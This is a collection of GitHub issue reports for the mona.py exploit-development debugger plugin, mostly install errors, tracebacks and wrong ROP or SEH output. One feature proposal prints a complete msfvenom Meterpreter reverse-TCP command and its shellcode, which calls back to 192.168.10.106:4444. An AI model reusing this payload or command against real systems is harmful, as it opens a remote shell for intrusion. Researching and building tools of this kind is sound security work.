Work in progress: https://github.com/wangray/mona

How likely is this to get merged? Should we maintain x64dbg support separately? @corelanc0d3r

Expected behavior

mona.py completes the ropchain/rop chain creation function.

Actual behavior

mona.py hangs at Step 1/7 for finding gadgets for VirtualProtect, outputting the following. (See picture below.)

Steps to reproduce the problem

Open WinDBG x86, attach to an already running x86 program; and run .load pykd.pyd; followed by either !py mona rop or !py mona rop -m kernel32.dll

Other useful information (mona version, debugger & debugger version, OS version, etc)

Latest pykd, (0.3.2.2), Latest mona.py revision (2.0 r599), Windows 10 Pro x64, WinVer 1809, WinDBGx86. I have used this against my target along with !py mona rop -m kernel32.dll (Presumably) both progress to another error (this was after me going to sleep) which I regret not logging, mentioning .symfix. Same results. - Run in a vanilla FLARE_VM, aside from software I am trying to exploit. _NT_SYMBOL_PATH = srv*c:\symbols*http://msdl.microsoft.com/download/symbols

Have had issues with mona/windbglib in the past, reference here

Edit: Seems to be a symbol problem. Taking a VM snapshot and will experiment. I'm a primary Linux guy, any help is appreciated.

^ Related error.

tier0.dll is a proprietary, non-standard .dll - could this be why?

Expected behavior

Mona should spit back data when launched (!mona) from the Immunity Debugger 1.85

Actual behavior

pycommands: error importing module
....
line 87 in
import urllib ...
Error Image here

Steps to reproduce the problem

installed Immunity Debugger and updated from python 2.7.1 to python 2.7.14
added mona.py to the PyCommands folder
started Immunity Debugger as an admin
use !mona

Other useful information (mona version, debugger & debugger version, OS version, etc)

OS: Windows 7 x64 SP 1
immunity debugger 1.85

Expected behavior

Possible to use the mona plugin in immuniy debugger 1.85.

Actual behavior

!mona
PyCommands: error importing module

Steps to reproduce the problem

add mona.py to the PyCommands folder
start Immunity Debugger
use !mona

Other useful information

OS: Windows xp
immuniy debugger 1.85

When opening a new issue, please fill out the following sections:

Expected behavior

mona.py completes the ropchain/rop chain creation function.

Actual behavior

Mona throw errors when trying to produce VirtualProtect ropchain. The issue is the same case as someone here #44 but I got more errors.

Steps to reproduce the problem

• I'm following default installation of Mona in Windbg as mentioned here https://github.com/corelan/windbglib
• I'm trying to create a rop version of this exploit (https://www.exploit-db.com/exploits/45505) but when I do the problem persist across Windows installation.
• If you have time to try:
  • Zahir download: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
  • Update to latest version: https://zahir.info/download/UpdateZahir6/Zahir_CS_6_Build13.zip

Other useful information (mona version, debugger & debugger version, OS version, etc)

• Mona version is latest
• Debugger is windbg x86
• Windbg version is 10.0.19041.1 x86
• OS is WinDev2005 (enterprise evaluation https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/)

Last logs related to errors

************* Symbol Loading Error Summary **************
Module name            Error
Tee710                 The system cannot find the file specified

You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2951, in getIAT
    thisfuncfullname = thisfunc.getName().lower()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1819, in getName
    syms = thismod.getSymbols()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 1556, in getSymbols
    ntHeader = getNtHeaders(self.modbase)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbglib.py", line 109, in getNtHeaders
    return pykd.module("ntdll").typedVar(ntheaders, modulebase + pykd.ptrDWord(modulebase + 0x3c))
TypeException: _IMAGE_NT_HEADERS : symbol name is not found

** Error trying to process module TeeUI710.bpl
** Error trying to process module TeeUI710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvDlgs100.bpl
** Error trying to process module JvDlgs100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module vclactnband100.bpl
** Error trying to process module vclactnband100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JvStdCtrls100.bpl
** Error trying to process module JvStdCtrls100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module rtl100.bpl
** Error trying to process module rtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module VclSmp100.bpl
** Error trying to process module VclSmp100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module TeeDB710.bpl
** Error trying to process module TeeDB710.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module xmlrtl100.bpl
** Error trying to process module xmlrtl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module JclVcl100.bpl
** Error trying to process module JclVcl100.bpl
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2915, in getIAT
    syms = themod.getSymbols()
AttributeError: 'NoneType' object has no attribute 'getSymbols'

** Error trying to process module Windows.StateRepositoryPS.dll
********************************************************************************
Traceback (most recent call last):
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 19097, in main
    commands[command].parseProc(opts)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 12050, in procROP
    findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 6558, in findROPGADGETS
    vplogtxt = createRopChains(suggestions,interestinggadgets,ropgadgets,modulecriteria,criteria,objprogressfile,progressfile)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 8812, in createRopChains
    thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 9572, in getPickupGadget
    allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 7601, in findPattern
    outside = getRangesOutsideModules()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5344, in getRangesOutsideModules
    populateModuleInfo()
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 5818, in populateModuleInfo
    thismod = MnModule(key)
  File "C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\mona.py", line 2720, in __init__
    mzbase    = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

********************************************************************************

Thank you for your help Peter.

If "Debugging options -> Disasm -> Disassemble in lowercase" is enabled, !mona rop produces invalid results. !mona stackpivot doesn't produce any results.

Suggestions how to fix this (pick one):

1. Uppercase the disassembly / lowercase find patterns / do whatever needed to make them match
2. Make !mona commands whine verbosely if disassembly is in lower-case
3. For the duration of !mona commands, configure Immunity debugger to produce disassembly in upper-case
4. Document this somehow =D

Hello Peter,

I happened to dug into the implementation of the findwild command and discovered undocumented and unimplemented (functionality) -type switch.

If you don't plan to implement this feature then code associated with it can be safely removed (I pinned it in my local repository and can send a pull request if you approve).

On the other hand, if you plan to implement it how useful will be wildcard search for bin (opcode sequence) type? Is there a need to search for bytes, for example, like this -- \xFF?\x24*\x1C -- with (?) representing single byte, and (*) representing any number of bytes? (I really don't know answer to this question since I'm just getting into the exploit development).

Expected behavior

With a custom workingfolder configured, when using !mona compare -a ESP -f bytearray.bin the file bytearray.bin should be found in the workingfolder.

Actual behavior

Unable to find/read file bytearray.bin

Steps to reproduce the problem

!mona config -set workingfolder C:\immdbg\%p
!mona bytearray
!mona compare -a ESP -f bytearray.bin

Is it possible to automate the proccess to open Immunity debugger and run mona without need to open the GUI

!mona to run the file ?

I want to write a spreate python file to do that is it possible threw the API

Checking RM2MP3Converter on Win 7 Ultimate x64, an invalid opcode was returnd in rop.txt

Expected behavior

0x100150xx :  # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN    ** [MSRMfilter03.dll] **   |   {PAGE_EXECUTE_READ}

Actual behavior

0x100150xx :  # LEA EDX,ESP # PUSH EAX # ADD DWORD PTR DS:[EAX],EDX # MOV EAX,1 # RETN    ** [MSRMfilter03.dll] **   |   {PAGE_EXECUTE_READ}

as can be seen, LEA EDX,ESP has been suggested, which is an invalid opcode, AFAIK.

It seems functions about finding ROP gadget only assume that it's on x86 architecture. Is supporting for amd64 in development?

When opening a new issue, please fill out the following sections:

Expected behavior

Typically, a README.md file contains a summary of what the project is/does, and also contains references to further documentation.

Actual behavior

There is no documentation found in this repository.

Steps to reproduce the problem

Check the README.md file for any documentation or references.

Other useful information (mona version, debugger & debugger version, OS version, etc)

N/A

Hi,

I tried to use an egghunter with checksum verification generated by mona but it crashed.
Through step by step execution I identified that the last conditional jump was wrong.
You'll find the corresponding mona output attach to this message.
You can easly see what I'm talking about by copying / pasting the egghunter into a debugger.
You'll see that the last conditional jump points to an address between two instructions.
I thought at first that it was a sort of code length optimization but this is not the case.
To fix it I modified the jump to point to the "INC EDX".

egghunter.txt

When I using the mona.py to create the Rop chains, then it stop
at this pos:
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
[+] Attempting to produce rop chain for VirtualProtect
Step 1/7: esi
I am waiting for many hours, and still pause at there.

The env:
pykd 0.3
The Os:
windows 8
The python:
python 2.7
The commands:
.load pykd
!py mona
!py mona config -set workingfolder "C:\logs%p"
!py mona rop -m kernel32.dll,ntdll,msvcr120.dll

I put the mona.py into Immunity Debugger's PyCommands. And type "!mona modules" there 0 line of results. The screenshot at below:

Crash when I run the command: !mona rop -m ntdll

Steps to reproduce the problem

Included exe file and log files:

_rop_progress_for_testing.exe_1792.log
Log.txt
for_testing_exe_.txt
Windows 7 SP1 syswow64 folder: ntdll_dll_.txt

Other useful information

Windows 7 x64 on vmware workstation
4 GB RAM for the VM!
I am running Immunity debugger as administrator
Installed visual studio 2017 c++ redistributable x32
Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:30:55) [MSC v.1500 32 bit (Intel)] on win32
Immunity debugger 1.85
Mona Plugin version : 2.0 r585 (latest update)

Hi :)
I think it could be helpful if the output to rop.txt (and possibly other files as well?) would be sorted, by anything. I would use a default sorting by address, but perhaps if there are more sorting ideas it's possible to add a command line flag to change default behavior.
Sounds to me like it's basically casting a set to a list and calling sort at some point in the code, but seeing as it's a 18+ KLOC file, it's hard for me to tell for certain.

Once i execute a command,it'l give me this information.
My OS is window 7 64bit.
I install 32bit windbg and 64bit windbg both.
The 32bit windbg can execute the mona plugin success ,but the 64bit windbg will give me this information:

0:000> !py mona modules
Hold on...
[+] Command used:
!py mona.py modules

---------- Mona command started on 2016-12-13 01:39:34 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll

---

Traceback (most recent call last):
File "mona.py", line 18183, in main
commands[command].parseProc(opts)
File "mona.py", line 11240, in procShowMODULES
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5442, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5557, in populateModuleInfo
thismod = MnModule(key)
File "mona.py", line 2538, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

---

and every command can't be execute yet

0:000> !py mona rop
Hold on...
[+] Command used:
!py mona.py rop

---------- Mona command started on 2016-12-13 01:45:00 (v2.0, rev 567) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module api_ms_win_crt_locale_l1_1_0
** Error trying to process module api_ms_win_core_processthreads_l1_1_1
** Error trying to process module api_ms_win_crt_convert_l1_1_0
** Error trying to process module api_ms_win_crt_stdio_l1_1_0
** Error trying to process module ConsoleApplication5
** Error trying to process module kernel32
** Error trying to process module api_ms_win_core_localization_l1_2_0
** Error trying to process module api_ms_win_core_file_l2_1_0
** Error trying to process module ntdll
** Error trying to process module api_ms_win_core_timezone_l1_1_0
** Error trying to process module ucrtbase
** Error trying to process module api_ms_win_crt_heap_l1_1_0
** Error trying to process module api_ms_win_core_synch_l1_2_0
** Error trying to process module KERNELBASE
** Error trying to process module VCRUNTIME140
** Error trying to process module api_ms_win_core_file_l1_2_0
** Error trying to process module api_ms_win_crt_string_l1_1_0
** Error trying to process module api_ms_win_crt_runtime_l1_1_0
** Error trying to process module api_ms_win_crt_math_l1_1_0
** Error trying to process module api-ms-win-core-synch-l1-2-0.dll

---

Traceback (most recent call last):
File "mona.py", line 18183, in main
commands[command].parseProc(opts)
File "mona.py", line 11341, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "mona.py", line 6033, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5442, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5557, in populateModuleInfo
thismod = MnModule(key)
File "mona.py", line 2538, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'

---

When opening a new issue, please fill out the following sections:

Expected behavior

List the modules that don't have any memory checks

Actual behavior

Steps to reproduce the problem

Type !mona modules

Other useful information (mona version, debugger & debugger version, OS version, etc)

mona "current version" as of 10/16/2018, immunity debugger version 1.85, python 2.7.15, windows 10 64 current version

Expected behavior

The script should run without crashing even if a system uses Python3 as default.

Actual behavior

The script crashes when loaded with Python3, the current supported version which is becoming more standard.

Steps to reproduce the problem

python mona.py on a system for which Python3 is default.

I suggest adding the following shebang to mona.py.
#!/usr/bin/env python2.7

As an example, trying to load Mona from Immunity Debugger on a Windows system with Python3 as default will result in an error. By adding that shebang, Mona loads fine if the system also has Python2.7 installed.

1. Narly plugin on windbg:

0:015> !nmod
00030000 0003c000 CRYPTBASE NO_SEH *ASLR *DEP C:\Windows\syswow64\CRYPTBASE.dll
00230000 00239000 netutils /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\netutils.dll
00240000 0024f000 wkscli /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wkscli.dll
00320000 0032d000 wshbth /SafeSEH ON /GS *ASLR *DEP C:\Windows\SysWOW64\wshbth.dll
00330000 0033a000 NO_SEH *ASLR *DEP C:\Program Files (x86)\masked
\masked.dll

1. Mona on windbg:
   0x00330000 | 0x0033a000 | 0x0000a000 | True | True | True | True | False | 2016.0.0.2150 [masked.dll](C:Program Files %28x86%29maskedmasked.dll)
   0x40210000 | 0x40215000 | 0x00005000 | False | True | True | True | True | 6.1.7600.16385 [MSIMG32.dll](C:
   WindowsSysWOW64MSIMG32.dll)
2. Mona on Immunity
   Log data, item 5
   Address=0BADF00D
   Message= 0x002b0000 | 0x002ba000 | 0x0000a000 | True | True | True | True | False | 2016.0.0.2150
   [masked.dll](C:Program Files %28x86%29maskedmasked.dll)
3. SafeSEH plugin on Olly
   /SafeSEH Module Scanner, item 5
   SEH mode=No SEH
   Base=0x560000
   Limit=0x56a000
   Module version=2016.0.0.2150
   Module Name=C:\Program Files (x86)\masked\masked.dll

Narly and SafeSEH says my module masked.dll is safeSEH OFF. But mona on windbg & Immunity doesn't say the same. Infact, I see 4-6 safeSEH modules with other plugins but mona says all are SEH protected. Probably that's why "!mona seh" results into nothing.

Tested on Windows 7 64-bit with WinDbg:6.12.0002.633 x86 and Immunity v1.85

Just seeing if anyone else is have 'Error importing module' for importing into Immunity Debugger 1.85 32 bit OS.

The plug-in was installed in accordance with the https://github.com/corelan/windbglib
I tried different versions of this plugin, including the last one
I assume that this error has been discussed many times, but I have not found solutions to this problem

0:000> !py mona jmp -r ESP
Hold on...
[+] Command used:
!py mona.py jmp -r ESP
---------- Mona command started on 2017-10-15 04:41:48 (v2.0, rev 570) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules

Traceback (most recent call last):
File "mona.py", line 18207, in main
commands[command].parseProc(opts)
File "mona.py", line 11212, in procFindJMP
all_opcodes=findJMP(modulecriteria,criteria,args["r"].lower().strip())
File "mona.py", line 5846, in findJMP
modulestosearch = getModulesToQuery(modulecriteria)
File "mona.py", line 5466, in getModulesToQuery
populateModuleInfo()
File "mona.py", line 5577, in populateModuleInfo
allmodules=dbg.getAllModules()
File "C:\dbgs\WinDbg\windbglib.py", line 1160, in getAllModules
getModulesFromPEB()
File "C:\dbgs\WinDbg\windbglib.py", line 366, in getModulesFromPEB
moduleLst = pykd.typedVarList(peb.Ldr.deref().InLoadOrderModuleList, "ntdll!_LDR_DATA_TABLE_ENTRY", "InMemoryOrderLinks.Flink")
TypeException: _LDR_DATA_TABLE_ENTRY : symbol name is not found

Hi there,
I am trying to use the mona.py module with Immunity debugger v1.85 but I get error message "pycommands: error importing module."
already did place mona.py file inside the pycommands folder.

Regards,

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#Mona

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improve its referencing.

Badges

The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.

Hi,
Sometimes we can control values at esp-0x???, it would be great if the -distance option can take a negative value :)

Thank you

Summary:
I've been working on a feature to Compare a file created by msfvenom/gdb/hex/xxd/hexdump/ollydbg with a copy in memory. It is similar to the command "compare" but instead of reading from a binary file, it read and parse output from msfvenom, gdb, and a few others.
The idea is to quickly compare the integrity of the injected shellcode

The feature is ported from expdevBadChars (https://github.com/mgeeky/expdevBadChars), which i find it quite useful.

I've written a working alpha build on a forked branch, but the code still need some touch up before i submit a PR. I am just wondering if you are OK with the added feature and would consider a merge on upstream?
https://github.com/onlylonly/mona/tree/advcompare-alpha

Example
Some demonstration & example of the proposed feature

content of file 2a.txt

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.106 LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of py file: 1644 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4d\x77\x26\x07\x89\xe8\xff"
buf += "\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
buf += "\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x0a\x6a\x68\x02"
buf += "\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
buf += "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
buf += "\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
buf += "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
buf += "\x53\xff\xd5"

the mona command
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80
or
!mona advcompare -f d:\tmp\2a.txt -a 0019FC80 -t msfvenom-python

if parameter -t (format type) is supplied, mona will honor the user supplied format, otherwise, mona will attempt to guess the format type based on regular expression.

Looking to hearing from you, and thanks for sharing & maintaining mona.py. Its a wonderful tool.

Request feature x64dbg/x64dbgpy#6

Setup -- OS: Windows XP SP 3 Eng, program - Easy RM to MP3 Converter (from Exploit Writing Tutorial, part 1 on corelan.be), latest version of mona recently pulled from Github, Immunity Debugger v1.85

Command !mona seh finds duplicate addresses and give incorrect instruction for the opcode sequence for one of the found cases:

0x00436213 : jmp dword ptr ss:[esp+1c]| startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)

0x00436213 : call dword ptr ss:[esp+1c]| startnull,ascii {PAGE_EXECUTE_READ} [RM2MP3Converter.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.7.3.700 (C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe)

The opcode at the 0x00436213 address is FF54241C which corresponds to call dword [esp+0x1c] instruction.

When opening a new issue, please fill out the following sections:

Expected behavior

Actual behavior

pycommands: error importing module

Steps to reproduce the problem

Windows 10 Home Native (no VM)
Immunity debugger using command !mona

Other useful information (mona version, debugger & debugger version, OS version, etc)

Python 2.7 32-bit
PATH added
Other commands working like !list or !heap or !mike

I can see when I run any other command a .pyc file is created but that never happens when trying to use mona commands.

I verified the size of mona.py file and privileges. It keeps showing "pycommands: error importing module"
Please help

When opening a new issue, please fill out the following sections:

Expected behavior

Mona.py should create rop_chains.txt and rop.txt files after running one of the following commands:

!mona rop -m slmfc.dll -n -cpb "\x00\x0a\x0d"
!mona rop -m slmfc.dll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n cpb "\x00\x0a\x0d"
!mona rop -m *.dlll -n -cpb "\x00\x0a\x0d"
!mona rop
!mona rop -m slmfc.dll

Actual behavior

Mona throws an
_rop_progress_SLmail.exe_1164.log
error (see screenshot).

I see local variable referenced before assignment error on a splash screen ( could not capture that error though)

Steps to reproduce the problem

1. Install SLMail 5.5.x on Windows 7 SP1
2. Make sure that DEP is set to OptOut mode ( not sure if that matters)

Other useful information (mona version, debugger & debugger version, OS version, etc)

1. Mona version: latest version as of today
2. Python version 2.7.16
3. Immunity Debugger version 1.85
4. O.S : Windows 7 SP1

When opening a new issue, please fill out the following sections:

Expected behavior

!mona modules should be running

Actual behavior

Error dll load failed 1 is not a valid win32 application

Steps to reproduce the problem

1, Donwload mona
2, Copy it to pycommands of ID
3, run !mona modules
4, Got error: dll load failed 1 is not a valid win32 application

Other useful information (mona version, debugger & debugger version, OS version, etc)

Mona: Newest version
ID: v1.85
OS: Windows 10 (64 bits)

When opening a new issue, please fill out the following sections:

Expected behavior

get rop chain

Actual behavior

[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll

Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'

Steps to reproduce the problem

2:033> !py mona rop -m mshtml.dll
Hold on...
[+] Command used:
!py mona.py rop -m mshtml.dll

---------- Mona command started on 2022-10-27 22:17:13 (v2.0, rev 618) ----------
[+] Processing arguments and criteria
- Pointer access level : X
- Only querying modules mshtml.dll
[+] Generating module info table, hang on...
- Processing modules
- Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_iexplore.exe_2592.log'
- (Re)setting logfile _rop_progress_iexplore.exe_2592.log
[+] Progress will be written to _rop_progress_iexplore.exe_2592.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Going to create rop chains for all relevant/supported techniques:
[+] Enumerating 22 endings in 1 module(s)...
- Querying module mshtml.dll

Traceback (most recent call last):
File "mona.py", line 19195, in main
commands[command].parseProc(opts)
File "mona.py", line 12147, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique)
File "mona.py", line 6380, in findROPGADGETS
found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'

Other useful information (mona version, debugger & debugger version, OS version, etc)

windbg6.12
windows7 Pro
mshtml ver: File version: 8.0.7600.16385

Where is the priority:ultra-low switch? :)

For some reason the reference to my URL in one of the comments has a typo:
http://www.floyd.cd
it should be
http://www.floyd.ch

cheers,
floyd

I'm trying to see if Mona has installed correctly by running simply commands against Notepad++. Below is the output that Mona gives me when I run the rop command (other commands that need module information appear to give similar output). This is on Windows 8.1 x64 (running a 32bit debugger).

0:009> !py mona rop
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py rop

---------- Mona command started on 2015-05-02 13:15:18 (v2.0, rev 557) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module image74150000
** Error trying to process module image00400000
** Error trying to process module kernel.appcore.dll

Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 17996, in main
commands[command].parseProc(opts)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 11257, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5961, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
